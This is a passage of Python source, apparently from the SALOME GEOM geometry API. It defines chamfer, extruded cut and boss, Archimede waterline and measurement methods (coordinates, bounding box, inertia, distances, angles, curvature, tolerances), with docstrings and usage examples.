theShape Shape, to perform chamfer on.
theD1 Chamfer size along theFace1.
theD2 Chamfer size along theFace2.
theFace1,theFace2 Global indices of two faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
prism_faces = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["FACE"])
f_ind_1 = geompy.GetSubShapeID(prism, prism_faces[0])
f_ind_2 = geompy.GetSubShapeID(prism, prism_faces[1])
chamfer_e = geompy.MakeChamferEdge(prism, 10., 10., f_ind_1, f_ind_2)
"""
# Example: see GEOM_TestAll.py
theD1,theD2,Parameters = ParseParameters(theD1,theD2)
anObj = self.LocalOp.MakeChamferEdge(theShape, theD1, theD2, theFace1, theFace2)
RaiseIfFailed("MakeChamferEdge", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on edges
# @param theShape Shape, to perform chamfer on.
# @param theD Chamfer length
# @param theAngle Angle of chamfer (angle in radians or a name of variable which defines angle in degrees)
# @param theFace1,theFace2 Global indices of two faces of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
@ManageTransactions("LocalOp")
def MakeChamferEdgeAD(self, theShape, theD, theAngle, theFace1, theFace2, theName=None):
"""
Perform a chamfer on edges
Parameters:
theShape Shape, to perform chamfer on.
theD Chamfer length.
theAngle Angle of chamfer (angle in radians or a name of variable which defines angle in degrees).
theFace1,theFace2 Global indices of two faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
prism_faces = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["FACE"])
f_ind_1 = geompy.GetSubShapeID(prism, prism_faces[0])
f_ind_2 = geompy.GetSubShapeID(prism, prism_faces[1])
ang = 30
chamfer_e = geompy.MakeChamferEdgeAD(prism, 10., ang, f_ind_1, f_ind_2)
"""
flag = False
if isinstance(theAngle,str):
flag = True
theD,theAngle,Parameters = ParseParameters(theD,theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.LocalOp.MakeChamferEdgeAD(theShape, theD, theAngle, theFace1, theFace2)
RaiseIfFailed("MakeChamferEdgeAD", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on all edges of the specified faces,
# with distance D1 on the first specified face (if several for one edge)
# @param theShape Shape, to perform chamfer on.
# @param theD1 Chamfer size along face from \a theFaces. If both faces,
# connected to the edge, are in \a theFaces, \a theD1
# will be measured along the face which is nearer to \a theFaces beginning.
# @param theD2 Chamfer size along another of two faces, connected to the edge.
# @param theFaces Sequence of global indices of faces of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_chamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferFaces(self, theShape, theD1, theD2, theFaces, theName=None):
"""
Perform a chamfer on all edges of the specified faces,
with distance D1 on the first specified face (if several for one edge)
Parameters:
theShape Shape, to perform chamfer on.
theD1 Chamfer size along face from theFaces. If both faces,
connected to the edge, are in theFaces, theD1
will be measured along the face which is nearer to theFaces beginning.
theD2 Chamfer size along another of two faces, connected to the edge.
theFaces Sequence of global indices of faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note: Global index of sub-shape can be obtained, using method geompy.GetSubShapeID().
Returns:
New GEOM.GEOM_Object, containing the result shape.
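Example of usage (a minimal sketch; 'prism' is assumed to be an existing solid):
prism_faces = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["FACE"])
f_ind_1 = geompy.GetSubShapeID(prism, prism_faces[0])
f_ind_2 = geompy.GetSubShapeID(prism, prism_faces[1])
chamfer_f = geompy.MakeChamferFaces(prism, 10., 10., [f_ind_1, f_ind_2])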
"""
# Example: see GEOM_TestAll.py
theD1,theD2,Parameters = ParseParameters(theD1,theD2)
anObj = self.LocalOp.MakeChamferFaces(theShape, theD1, theD2, theFaces)
RaiseIfFailed("MakeChamferFaces", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## The same as MakeChamferFaces(), but with theD as the chamfer length and
# theAngle as the angle of chamfer (in radians, or a name of variable which defines angle in degrees)
#
# @ref swig_FilletChamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferFacesAD(self, theShape, theD, theAngle, theFaces, theName=None):
"""
The same as geompy.MakeChamferFaces, but with theD as the chamfer length and
theAngle as the angle of chamfer (in radians, or a name of variable which defines angle in degrees)
"""
flag = False
if isinstance(theAngle,str):
flag = True
theD,theAngle,Parameters = ParseParameters(theD,theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.LocalOp.MakeChamferFacesAD(theShape, theD, theAngle, theFaces)
RaiseIfFailed("MakeChamferFacesAD", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on edges,
# with distance D1 on the first specified face (if several for one edge)
# @param theShape Shape, to perform chamfer on.
# @param theD1,theD2 Chamfer size
# @param theEdges Sequence of edges of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref swig_FilletChamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferEdges(self, theShape, theD1, theD2, theEdges, theName=None):
"""
Perform a chamfer on edges,
with distance D1 on the first specified face (if several for one edge)
Parameters:
theShape Shape, to perform chamfer on.
theD1,theD2 Chamfer size
theEdges Sequence of edges of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
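Example of usage (a minimal sketch; 'prism' is assumed to be an existing solid;
theEdges is given here as a list of global edge indices, an assumption consistent with the other chamfer calls):
prism_edges = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["EDGE"])
e_ind_1 = geompy.GetSubShapeID(prism, prism_edges[0])
chamfer_e = geompy.MakeChamferEdges(prism, 10., 10., [e_ind_1])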
"""
theD1,theD2,Parameters = ParseParameters(theD1,theD2)
anObj = self.LocalOp.MakeChamferEdges(theShape, theD1, theD2, theEdges)
RaiseIfFailed("MakeChamferEdges", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## The same as MakeChamferEdges(), but with theD as the chamfer length and
# theAngle as the angle of chamfer (in radians, or a name of variable which defines angle in degrees)
@ManageTransactions("LocalOp")
def MakeChamferEdgesAD(self, theShape, theD, theAngle, theEdges, theName=None):
"""
The same as geompy.MakeChamferEdges, but with theD as the chamfer length and
theAngle as the angle of chamfer (in radians, or a name of variable which defines angle in degrees)
"""
flag = False
if isinstance(theAngle,str):
flag = True
theD,theAngle,Parameters = ParseParameters(theD,theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.LocalOp.MakeChamferEdgesAD(theShape, theD, theAngle, theEdges)
RaiseIfFailed("MakeChamferEdgesAD", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## @sa MakeChamferEdge(), MakeChamferFaces()
#
# @ref swig_MakeChamfer "Example"
def MakeChamfer(self, aShape, d1, d2, aShapeType, ListShape, theName=None):
"""
See geompy.MakeChamferEdge() and geompy.MakeChamferFaces() functions for more information.
"""
# Example: see GEOM_TestOthers.py
anObj = None
# note: auto-publishing is done in self.MakeChamferEdge() or self.MakeChamferFaces()
if aShapeType == self.ShapeType["EDGE"]:
anObj = self.MakeChamferEdge(aShape,d1,d2,ListShape[0],ListShape[1],theName)
else:
anObj = self.MakeChamferFaces(aShape,d1,d2,ListShape,theName)
return anObj
## Remove material from a solid by extrusion of the base shape on the given distance.
# @param theInit Shape to remove material from. It must be a solid or
# a compound made of a single solid.
# @param theBase Closed edge or wire defining the base shape to be extruded.
# @param theH Prism dimension along the normal to theBase
# @param theAngle Draft angle in degrees.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the initial shape with removed material
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakeExtrudedCut(self, theInit, theBase, theH, theAngle, theName=None):
"""
Remove material from a solid by extrusion of the base shape on the given distance.
Parameters:
theInit Shape to remove material from. It must be a solid or a compound made of a single solid.
theBase Closed edge or wire defining the base shape to be extruded.
theH Prism dimension along the normal to theBase
theAngle Draft angle in degrees.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the initial shape with removed material.
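Example of usage (a minimal sketch; 'solid' and the closed 'wire' are assumed to exist):
# remove a prism of height 50 defined by the wire from the solid, no draft angle
cut = geompy.MakeExtrudedCut(solid, wire, 50, 0)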
"""
# Example: see GEOM_TestAll.py
#theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakeDraftPrism(theInit, theBase, theH, theAngle, False)
RaiseIfFailed("MakeExtrudedBoss", self.PrimOp)
#anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "extrudedCut")
return anObj
## Add material to a solid by extrusion of the base shape on the given distance.
# @param theInit Shape to add material to. It must be a solid or
# a compound made of a single solid.
# @param theBase Closed edge or wire defining the base shape to be extruded.
# @param theH Prism dimension along the normal to theBase
# @param theAngle Draft angle in degrees.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the initial shape with added material
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakeExtrudedBoss(self, theInit, theBase, theH, theAngle, theName=None):
"""
Add material to a solid by extrusion of the base shape on the given distance.
Parameters:
theInit Shape to add material to. It must be a solid or a compound made of a single solid.
theBase Closed edge or wire defining the base shape to be extruded.
theH Prism dimension along the normal to theBase
theAngle Draft angle in degrees.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the initial shape with added material.
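Example of usage (a minimal sketch; 'solid' and the closed 'wire' are assumed to exist):
# add a prism of height 50 defined by the wire to the solid, no draft angle
boss = geompy.MakeExtrudedBoss(solid, wire, 50, 0)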
"""
# Example: see GEOM_TestAll.py
#theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakeDraftPrism(theInit, theBase, theH, theAngle, True)
RaiseIfFailed("MakeExtrudedBoss", self.PrimOp)
#anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "extrudedBoss")
return anObj
# end of l3_local
## @}
## @addtogroup l3_basic_op
## @{
## Perform an Archimede operation on the given shape with given parameters.
# The object presenting the resulting face is returned.
# @param theShape Shape to be put in water.
# @param theWeight Weight of the shape.
# @param theWaterDensity Density of the water.
# @param theMeshDeflection Deflection of the mesh, used to compute the section.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a section of \a theShape
# by a plane, corresponding to water level.
#
# @ref tui_archimede "Example"
@ManageTransactions("LocalOp")
def Archimede(self, theShape, theWeight, theWaterDensity, theMeshDeflection, theName=None):
"""
Perform an Archimede operation on the given shape with given parameters.
The object presenting the resulting face is returned.
Parameters:
theShape Shape to be put in water.
theWeight Weight of the shape.
theWaterDensity Density of the water.
theMeshDeflection Deflection of the mesh, used to compute the section.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a section of theShape
by a plane, corresponding to water level.
"""
# Example: see GEOM_TestAll.py
theWeight,theWaterDensity,theMeshDeflection,Parameters = ParseParameters(
theWeight,theWaterDensity,theMeshDeflection)
anObj = self.LocalOp.MakeArchimede(theShape, theWeight, theWaterDensity, theMeshDeflection)
RaiseIfFailed("MakeArchimede", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "archimede")
return anObj
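# Usage sketch (illustrative values: a shape of weight 100 floating in water
# of density 1, with mesh deflection 0.01):
#   waterline = geompy.Archimede(aShape, 100., 1., 0.01)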
# end of l3_basic_op
## @}
## @addtogroup l2_measure
## @{
## Get point coordinates
# @return [x, y, z]
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def PointCoordinates(self,Point):
"""
Get point coordinates
Returns:
[x, y, z]
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.PointCoordinates(Point)
RaiseIfFailed("PointCoordinates", self.MeasuOp)
return aTuple
## Get vector coordinates
# @return [x, y, z]
#
# @ref tui_measurement_tools_page "Example"
def VectorCoordinates(self,Vector):
"""
Get vector coordinates
Returns:
[x, y, z]
"""
p1=self.GetFirstVertex(Vector)
p2=self.GetLastVertex(Vector)
X1=self.PointCoordinates(p1)
X2=self.PointCoordinates(p2)
return (X2[0]-X1[0],X2[1]-X1[1],X2[2]-X1[2])
## Compute cross product
# @return vector w=u^v
#
# @ref tui_measurement_tools_page "Example"
def CrossProduct(self, Vector1, Vector2):
"""
Compute cross product
Returns: vector w=u^v
"""
u=self.VectorCoordinates(Vector1)
v=self.VectorCoordinates(Vector2)
w=self.MakeVectorDXDYDZ(u[1]*v[2]-u[2]*v[1], u[2]*v[0]-u[0]*v[2], u[0]*v[1]-u[1]*v[0])
return w
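# Usage sketch (unit vectors along OX and OY; their cross product is a
# vector along OZ):
#   u = geompy.MakeVectorDXDYDZ(1., 0., 0.)
#   v = geompy.MakeVectorDXDYDZ(0., 1., 0.)
#   w = geompy.CrossProduct(u, v)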
## Compute dot product
# @return dot product p=u.v
#
# @ref tui_measurement_tools_page "Example"
def DotProduct(self, Vector1, Vector2):
"""
Compute dot product
Returns: dot product p=u.v
"""
u=self.VectorCoordinates(Vector1)
v=self.VectorCoordinates(Vector2)
p=u[0]*v[0]+u[1]*v[1]+u[2]*v[2]
return p
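# Usage sketch (perpendicular vectors yield a zero dot product):
#   u = geompy.MakeVectorDXDYDZ(1., 0., 0.)
#   v = geompy.MakeVectorDXDYDZ(0., 1., 0.)
#   p = geompy.DotProduct(u, v)  # 0.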
## Get summarized length of all wires,
# area of surface and volume of the given shape.
# @param theShape Shape to define properties of.
# @return [theLength, theSurfArea, theVolume]\n
# theLength: Summarized length of all wires of the given shape.\n
# theSurfArea: Area of surface of the given shape.\n
# theVolume: Volume of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def BasicProperties(self,theShape):
"""
Get summarized length of all wires,
area of surface and volume of the given shape.
Parameters:
theShape Shape to define properties of.
Returns:
[theLength, theSurfArea, theVolume]
theLength: Summarized length of all wires of the given shape.
theSurfArea: Area of surface of the given shape.
theVolume: Volume of the given shape.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetBasicProperties(theShape)
RaiseIfFailed("GetBasicProperties", self.MeasuOp)
return aTuple
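# Usage sketch ('aShape' is any shape; the tuple unpacks in the documented
# order):
#   length, area, volume = geompy.BasicProperties(aShape)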
## Get parameters of bounding box of the given shape
# @param theShape Shape to obtain bounding box of.
# @param precise TRUE for precise computation; FALSE for fast one.
# @return [Xmin,Xmax, Ymin,Ymax, Zmin,Zmax]
# Xmin,Xmax: Limits of shape along OX axis.
# Ymin,Ymax: Limits of shape along OY axis.
# Zmin,Zmax: Limits of shape along OZ axis.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def BoundingBox (self, theShape, precise=False):
"""
Get parameters of bounding box of the given shape
Parameters:
theShape Shape to obtain bounding box of.
precise TRUE for precise computation; FALSE for fast one.
Returns:
[Xmin,Xmax, Ymin,Ymax, Zmin,Zmax]
Xmin,Xmax: Limits of shape along OX axis.
Ymin,Ymax: Limits of shape along OY axis.
Zmin,Zmax: Limits of shape along OZ axis.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetBoundingBox(theShape, precise)
RaiseIfFailed("GetBoundingBox", self.MeasuOp)
return aTuple
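# Usage sketch (precise computation of the axis-aligned bounds of 'aShape'):
#   xmin, xmax, ymin, ymax, zmin, zmax = geompy.BoundingBox(aShape, True)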
## Get bounding box of the given shape
# @param theShape Shape to obtain bounding box of.
# @param precise TRUE for precise computation; FALSE for fast one.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def MakeBoundingBox (self, theShape, precise=False, theName=None):
"""
Get bounding box of the given shape
Parameters:
theShape Shape to obtain bounding box of.
precise TRUE for precise computation; FALSE for fast one.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.MakeBoundingBox(theShape, precise)
RaiseIfFailed("MakeBoundingBox", self.MeasuOp)
self._autoPublish(anObj, theName, "bndbox")
return anObj
## Get inertia matrix and moments of inertia of theShape.
# @param theShape Shape to calculate inertia of.
# @return [I11,I12,I13, I21,I22,I23, I31,I32,I33, Ix,Iy,Iz]
# I(1-3)(1-3): Components of the inertia matrix of the given shape.
# Ix,Iy,Iz: Moments of inertia of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def Inertia(self,theShape):
"""
Get inertia matrix and moments of inertia of theShape.
Parameters:
theShape Shape to calculate inertia of.
Returns:
[I11,I12,I13, I21,I22,I23, I31,I32,I33, Ix,Iy,Iz]
I(1-3)(1-3): Components of the inertia matrix of the given shape.
Ix,Iy,Iz: Moments of inertia of the given shape.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetInertia(theShape)
RaiseIfFailed("GetInertia", self.MeasuOp)
return aTuple
## Check if the given coordinates are inside the shape (ST_IN or ST_ON)
# @param theShape Shape
# @param coords list of points coordinates [x1, y1, z1, x2, y2, z2, ...]
# @param tolerance to be used (default is 1.0e-7)
# @return list_of_boolean = [res1, res2, ...]
@ManageTransactions("MeasuOp")
def AreCoordsInside(self, theShape, coords, tolerance=1.e-7):
"""
Check if the given coordinates are inside the shape (ST_IN or ST_ON)
Parameters:
theShape Shape
coords list of points coordinates [x1, y1, z1, x2, y2, z2, ...]
tolerance to be used (default is 1.0e-7)
Returns:
list_of_boolean = [res1, res2, ...]
"""
return self.MeasuOp.AreCoordsInside(theShape, coords, tolerance)
## Get minimal distance between the given shapes.
# @param theShape1,theShape2 Shapes to find minimal distance between.
# @return Value of the minimal distance between the given shapes.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def MinDistance(self, theShape1, theShape2):
"""
Get minimal distance between the given shapes.
Parameters:
theShape1,theShape2 Shapes to find minimal distance between.
Returns:
Value of the minimal distance between the given shapes.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetMinDistance(theShape1, theShape2)
RaiseIfFailed("GetMinDistance", self.MeasuOp)
return aTuple[0]
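# Usage sketch (two vertices 100 apart along OX):
#   pA = geompy.MakeVertex(0., 0., 0.)
#   pB = geompy.MakeVertex(100., 0., 0.)
#   d = geompy.MinDistance(pA, pB)  # 100.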
## Get minimal distance between the given shapes.
# @param theShape1,theShape2 Shapes to find minimal distance between.
# @return Value of the minimal distance between the given shapes, in form of list
# [Distance, DX, DY, DZ].
#
# @ref swig_all_measure "Example"
@ManageTransactions("MeasuOp")
def MinDistanceComponents(self, theShape1, theShape2):
"""
Get minimal distance between the given shapes.
Parameters:
theShape1,theShape2 Shapes to find minimal distance between.
Returns:
Value of the minimal distance between the given shapes, in form of list
[Distance, DX, DY, DZ]
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetMinDistance(theShape1, theShape2)
RaiseIfFailed("GetMinDistance", self.MeasuOp)
aRes = [aTuple[0], aTuple[4] - aTuple[1], aTuple[5] - aTuple[2], aTuple[6] - aTuple[3]]
return aRes
## Get closest points of the given shapes.
# @param theShape1,theShape2 Shapes to find closest points of.
# @return The number of found solutions (-1 in case of infinite number of
# solutions) and a list of (X, Y, Z) coordinates for all couples of points.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def ClosestPoints (self, theShape1, theShape2):
"""
Get closest points of the given shapes.
Parameters:
theShape1,theShape2 Shapes to find closest points of.
Returns:
The number of found solutions (-1 in case of infinite number of
solutions) and a list of (X, Y, Z) coordinates for all couples of points.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.ClosestPoints(theShape1, theShape2)
RaiseIfFailed("ClosestPoints", self.MeasuOp)
return aTuple
## Get angle between the given shapes in degrees.
# @param theShape1,theShape2 Lines or linear edges to find angle between.
# @note If both arguments are vectors, the angle is computed in accordance
# with their orientations, otherwise the minimum angle is computed.
# @return Value of the angle between the given shapes in degrees.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetAngle(self, theShape1, theShape2):
"""
Get angle between the given shapes in degrees.
Parameters:
theShape1,theShape2 Lines or linear edges to find angle between.
Note:
If both arguments are vectors, the angle is computed in accordance
with their orientations, otherwise the minimum angle is computed.
Returns:
Value of the angle between the given shapes in degrees.
"""
# Example: see GEOM_TestMeasures.py
anAngle = self.MeasuOp.GetAngle(theShape1, theShape2)
RaiseIfFailed("GetAngle", self.MeasuOp)
return anAngle
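# Usage sketch (edges along OX and OY meet at 90 degrees):
#   e1 = geompy.MakeEdge(geompy.MakeVertex(0., 0., 0.), geompy.MakeVertex(1., 0., 0.))
#   e2 = geompy.MakeEdge(geompy.MakeVertex(0., 0., 0.), geompy.MakeVertex(0., 1., 0.))
#   a = geompy.GetAngle(e1, e2)  # 90.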
## Get angle between the given shapes in radians.
# @param theShape1,theShape2 Lines or linear edges to find angle between.
# @note If both arguments are vectors, the angle is computed in accordance
# with their orientations, otherwise the minimum angle is computed.
# @return Value of the angle between the given shapes in radians.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetAngleRadians(self, theShape1, theShape2):
"""
Get angle between the given shapes in radians.
Parameters:
theShape1,theShape2 Lines or linear edges to find angle between.
Note:
If both arguments are vectors, the angle is computed in accordance
with their orientations, otherwise the minimum angle is computed.
Returns:
Value of the angle between the given shapes in radians.
"""
# Example: see GEOM_TestMeasures.py
anAngle = self.MeasuOp.GetAngle(theShape1, theShape2)*math.pi/180.
RaiseIfFailed("GetAngle", self.MeasuOp)
return anAngle
## Get angle between the given vectors in degrees.
# @param theShape1,theShape2 Vectors to find angle between.
# @param theFlag If True, the normal vector is defined by the two vectors cross,
# if False, the opposite vector to the normal vector is used.
# @return Value of the angle between the given vectors in degrees.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetAngleVectors(self, theShape1, theShape2, theFlag = True):
"""
Get angle between the given vectors in degrees.
Parameters:
theShape1,theShape2 Vectors to find angle between.
theFlag If True, the normal vector is defined by the two vectors cross,
if False, the opposite vector to the normal vector is used.
Returns:
Value of the angle between the given vectors in degrees.
"""
anAngle = self.MeasuOp.GetAngleBtwVectors(theShape1, theShape2)
if not theFlag:
anAngle = 360. - anAngle
RaiseIfFailed("GetAngleVectors", self.MeasuOp)
return anAngle
## The same as GetAngleVectors, but the result is in radians.
def GetAngleRadiansVectors(self, theShape1, theShape2, theFlag = True):
"""
Get angle between the given vectors in radians.
Parameters:
theShape1,theShape2 Vectors to find angle between.
theFlag If True, the normal vector is defined by the two vectors cross,
if False, the opposite vector to the normal vector is used.
Returns:
Value of the angle between the given vectors in radians.
"""
anAngle = self.GetAngleVectors(theShape1, theShape2, theFlag)*math.pi/180.
return anAngle
## @name Curve Curvature Measurement
# Methods for obtaining the radius of curvature of curves
# at a given point
## @{
## Measure curvature of a curve at a point, set by parameter.
# @param theCurve a curve.
# @param theParam parameter.
# @return radius of curvature of \a theCurve.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def CurveCurvatureByParam(self, theCurve, theParam):
"""
Measure curvature of a curve at a point, set by parameter.
Parameters:
theCurve a curve.
theParam parameter.
Returns:
radius of curvature of theCurve.
"""
# Example: see GEOM_TestMeasures.py
aCurv = self.MeasuOp.CurveCurvatureByParam(theCurve,theParam)
RaiseIfFailed("CurveCurvatureByParam", self.MeasuOp)
return aCurv
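# Usage sketch ('aCircle' is illustrative; for a circle the radius of
# curvature equals its radius at any parameter):
#   r = geompy.CurveCurvatureByParam(aCircle, 0.5)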
## Measure curvature of a curve at a point.
# @param theCurve a curve.
# @param thePoint given point.
# @return radius of curvature of \a theCurve.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def CurveCurvatureByPoint(self, theCurve, thePoint):
"""
Measure curvature of a curve at a point.
Parameters:
theCurve a curve.
thePoint given point.
Returns:
radius of curvature of theCurve.
"""
aCurv = self.MeasuOp.CurveCurvatureByPoint(theCurve,thePoint)
RaiseIfFailed("CurveCurvatureByPoint", self.MeasuOp)
return aCurv
## @}
## @name Surface Curvature Measurement
# Methods for obtaining the max and min radius of curvature of surfaces
# at a given point
## @{
## Measure max radius of curvature of surface.
# @param theSurf the given surface.
# @param theUParam Value of U-parameter on the referenced surface.
# @param theVParam Value of V-parameter on the referenced surface.
# @return max radius of curvature of theSurf.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MaxSurfaceCurvatureByParam(self, theSurf, theUParam, theVParam):
"""
Measure max radius of curvature of surface.
Parameters:
theSurf the given surface.
theUParam Value of U-parameter on the referenced surface.
theVParam Value of V-parameter on the referenced surface.
Returns:
max radius of curvature of theSurf.
"""
# Example: see GEOM_TestMeasures.py
aSurf = self.MeasuOp.MaxSurfaceCurvatureByParam(theSurf,theUParam,theVParam)
RaiseIfFailed("MaxSurfaceCurvatureByParam", self.MeasuOp)
return aSurf
## Measure max radius of curvature of surface at the given point
# @param theSurf the given surface.
# @param thePoint given point.
# @return max radius of curvature of theSurf.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MaxSurfaceCurvatureByPoint(self, theSurf, thePoint):
"""
Measure max radius of curvature of surface at the given point.
Parameters:
theSurf the given surface.
thePoint given point.
Returns:
max radius of curvature of theSurf.
"""
aSurf = self.MeasuOp.MaxSurfaceCurvatureByPoint(theSurf,thePoint)
RaiseIfFailed("MaxSurfaceCurvatureByPoint", self.MeasuOp)
return aSurf
## Measure min radius of curvature of surface.
# @param theSurf the given surface.
# @param theUParam Value of U-parameter on the referenced surface.
# @param theVParam Value of V-parameter on the referenced surface.
# @return min radius of curvature of theSurf.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MinSurfaceCurvatureByParam(self, theSurf, theUParam, theVParam):
"""
Measure min radius of curvature of surface.
Parameters:
theSurf the given surface.
theUParam Value of U-parameter on the referenced surface.
theVParam Value of V-parameter on the referenced surface.
Returns:
Min radius of curvature of theSurf.
"""
aSurf = self.MeasuOp.MinSurfaceCurvatureByParam(theSurf,theUParam,theVParam)
RaiseIfFailed("MinSurfaceCurvatureByParam", self.MeasuOp)
return aSurf
## Measure min radius of curvature of surface at the given point
# @param theSurf the given surface.
# @param thePoint given point.
# @return min radius of curvature of theSurf.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MinSurfaceCurvatureByPoint(self, theSurf, thePoint):
"""
Measure min radius of curvature of surface at the given point.
Parameters:
theSurf the given surface.
thePoint given point.
Returns:
Min radius of curvature of theSurf.
"""
aSurf = self.MeasuOp.MinSurfaceCurvatureByPoint(theSurf,thePoint)
RaiseIfFailed("MinSurfaceCurvatureByPoint", self.MeasuOp)
return aSurf
## @}
## Get min and max tolerances of sub-shapes of theShape
# @param theShape Shape, to get tolerances of.
# @return [FaceMin,FaceMax, EdgeMin,EdgeMax, VertMin,VertMax]\n
# FaceMin,FaceMax: Min and max tolerances of the faces.\n
# EdgeMin,EdgeMax: Min and max tolerances of the edges.\n
# VertMin,VertMax: Min and max tolerances of the vertices.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def Tolerance(self,theShape):
"""
Get min and max tolerances of sub-shapes of theShape
Parameters:
theShape Shape, to get tolerances of.
Returns:
[FaceMin,FaceMax, EdgeMin,EdgeMax, VertMin,VertMax]
FaceMin,FaceMax: Min and max tolerances of the faces.
EdgeMin,EdgeMax: Min and max tolerances of the edges.
VertMin,VertMax: Min and max tolerances of the vertices.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetTolerance(theShape)
RaiseIfFailed("GetTolerance", self.MeasuOp)
return aTuple
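# Usage sketch (the tuple unpacks in the documented order):
#   fmin, fmax, emin, emax, vmin, vmax = geompy.Tolerance(aShape)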
## Obtain description of the given shape (number of sub-shapes of each type)
# @param theShape Shape to be described.
# @return Description of the given shape.
#
# @ref tui_measurement_tools_page "Example"
